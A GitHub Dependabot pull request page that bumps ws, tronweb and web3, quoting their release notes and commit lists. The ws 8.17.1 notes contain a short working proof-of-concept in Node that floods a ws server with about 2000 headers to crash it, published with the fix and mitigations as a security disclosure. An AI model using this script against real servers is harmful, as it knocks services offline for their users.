Skip to content

Bump ws, tronweb and web3#6

Open
dependabot[bot] wants to merge 1 commit intomasterfrom
dependabot/npm_and_yarn/multi-dde0d02dbd
Open

Bump ws, tronweb and web3#6
dependabot[bot] wants to merge 1 commit intomasterfrom
dependabot/npm_and_yarn/multi-dde0d02dbd

Conversation

@dependabot
Copy link
Copy Markdown

@dependabot dependabot bot commented on behalf of github Aug 21, 2024
edited
Loading

Bumps ws to 8.17.1 and updates ancestor dependencies ws, tronweb and web3. These dependencies need to be updated together.

Updates ws from 3.3.3 to 8.17.1

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

  • Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.

const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits
  • 3c56601 [dist] 8.17.1
  • e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
  • 6a00029 [test] Increase code coverage
  • ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
  • b73b118 [dist] 8.17.0
  • 29694a5 [test] Use the highWaterMark variable
  • 934c9d6 [ci] Test on node 22
  • 1817bac [ci] Do not test on node 21
  • 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
  • e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
  • Additional commits viewable in compare view

Updates tronweb from 4.4.0 to 5.3.2

Release notes

Sourced from tronweb's releases.

v5.3.2

  • Add custom block header argument for building transactions locally in transactionBuilder lib
  • Support TIP586 by trx.getBandwidthPrices and trx.getEnergyPrices
  • Support recover transaction signer address by trx.ecRecover
  • Support multi-dimension address array such as address[][] for ABI params encoding in triggerSmartContract and createSmartContract #433
  • Fix error when triggerSmartContract with error address due to the undefined callback #429
  • Bump axios from 0.26.1 to 1.6.2 #445

v5.3.1

  • Fix getBlockRange() error for range of 1 (tronprotocol/tronweb#398).
  • Add support for estimateenergy in TransactionBuilder#deployConstantContract() API.

v5.3.0

  • Replace elliptic with ethereum-cryptography/secp256k1
  • Bump ethers to ^6.6.0
  • Optimize argument validation for createToken, updateToken and applyForSR
  • callValue can be 0 when the contract constructor is payable
  • Support shouldPollResponse to customize poll times (tronprotocol/tronweb#368)
  • Support TIP541 by transactionBuilder.cancelUnfreezeBalanceV2
  • Support TIP542 by adding a parameter in transactionBuilder.delegateResource
  • Support estimate the energy used in contract deployment by transactionBuilder.deployConstantContract

v5.2.0

  • Support build transactions locally with protobuf
  • Support multi-sign for setAccountId, updateBrokerage, clearABI, updateAccountPermissions function in transactionBuilder lib

v5.1.1

v5.1.0

  • Add freezeBalanceV2, unfreezeBalanceV2, delegateResource, undelegateResource and withdrawExpireUnfreeze function in transactiobBuiler lib to support stakeV2
  • Support tronWeb.transactionBuilder.estimateEnergy to estimate energy for triggersmartcontract transaction
  • Add getDelegatedResourceV2, getDelegatedResourceAccountIndexV2, getCanDelegatedMaxSize, getAvailableUnfreezeCount and getCanWithdrawUnfreezeAmount function to query account resource info

v5.0.0

  • Add tronWeb.utils.transaction lib to serialize and deserialize transaction
  • Add tronWeb.utils.transaction.txJsonToPb function to convert transaction json to protobuf
  • Add tronWeb.utils.transaction.txPbToTxID function to get txID from transaction protobuf
  • Support new transaction builder createAccount
Commits
  • 3a81bf1 Merge pull request #480 from tronprotocol/release/v5.3.2
  • 9e59a03 feat: compat with ledger
  • 50e77f8 fix: change unit tests for getBandwidthPrices & getEnergyPrices
  • 14c3438 Merge branch 'release/v5.3.2' of github.com:tronprotocol/tronweb into release...
  • 0223b8e fix: replace named import with default export module
  • 5d5ba3b feat: using trongrid api parameter
  • 4eae496 feat: update readme
  • 43677b1 feat: ecRecover returns base58 format
  • 7ce7971 fix: npm audit fix
  • fb263c3 docs: add recent history
  • Additional commits viewable in compare view
Maintainer changes

This version was pushed to npm by troncore, a new releaser for tronweb since your current version.


Updates web3 from 1.10.4 to 4.11.1

Release notes

Sourced from web3's releases.

web3-eth@4.0.0-alpha.0

Initial alpha release

Install with yarn add web3-eth@4.0.0-alpha.0

web3-core-requestmanager@4.0.0-alpha.0

Initial alpha release

Install with yarn add web3-core-requestmanager@4.0.0-alpha.0

web3-providers-http@4.0.0-alpha.0

Initial alpha release

Install with yarn add web3-providers-http@4.0.0-alpha.0

web3-providers-base@1.0.0-alpha.1

Changed

  • Update version to 1.0.0-alpha.1 for web3-providers-base
  • Update version to 4.0.0-alpha.0 for web3-utils in web3-providers-base

web3-utils@4.0.0-alpha.0

Initial alpha release

Install with yarn add web3-utils@4.0.0-alpha.0

web3-packagetemplate@1.0.0-alpha.0

Initial alpha release

Install with yarn add web3-packagetemplate@1.0.0-alpha.0

Changelog

Sourced from web3's changelog.

[4.11.1]

Fixed

web3-errors

  • Fixed the undefined data in Eip838ExecutionError constructor (#6905)

web3-eth

  • Adds transaction property to be an empty list rather than undefined when no transactions are included in the block (#7151)
  • Change method getTransactionReceipt to not be casted as TransactionReceipt to give proper return type (#7159)

web3

  • Remove redundant constructor of contractBuilder (#7150)

[Unreleased]

Fixed

web3-utils

  • Fixed format schema with oneOf doesn't work correctly (#7055)

Added

web3-eth-accounts

  • Added public function signMessageWithPrivateKey (#7174)
Commits

You can trigger a rebase of this PR by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot merge will merge this PR after your CI passes on it
  • @dependabot squash and merge will squash and merge this PR after your CI passes on it
  • @dependabot cancel merge will cancel a previously requested merge and block automerging
  • @dependabot reopen will reopen this PR if it is closed
  • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    You can disable automated security fix PRs for this repo from the Security Alerts page.

Note
Automatic rebases have been disabled on this pull request as it has been open for over 30 days.

@dependabot
Bump ws, tronweb and web3
00bf981 
Bumps [ws](https://github.com/websockets/ws) to 8.17.1 and updates ancestor dependencies [ws](https://github.com/websockets/ws), [tronweb](https://github.com/tronprotocol/tronweb) and [web3](https://github.com/ChainSafe/web3.js). These dependencies need to be updated together.


Updates `ws` from 3.3.3 to 8.17.1
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@3.3.3...8.17.1)

Updates `tronweb` from 4.4.0 to 5.3.2
- [Release notes](https://github.com/tronprotocol/tronweb/releases)
- [Commits](tronprotocol/tronweb@v4.4.0...v5.3.2)

Updates `web3` from 1.10.4 to 4.11.1
- [Release notes](https://github.com/ChainSafe/web3.js/releases)
- [Changelog](https://github.com/web3/web3.js/blob/4.x/CHANGELOG.md)
- [Commits](web3/web3.js@v1.10.4...v4.11.1)

---
updated-dependencies:
- dependency-name: ws
  dependency-type: indirect
- dependency-name: tronweb
  dependency-type: direct:production
- dependency-name: web3
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot dependabot bot added the dependencies Pull requests that update a dependency file label Aug 21, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

dependencies Pull requests that update a dependency file

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants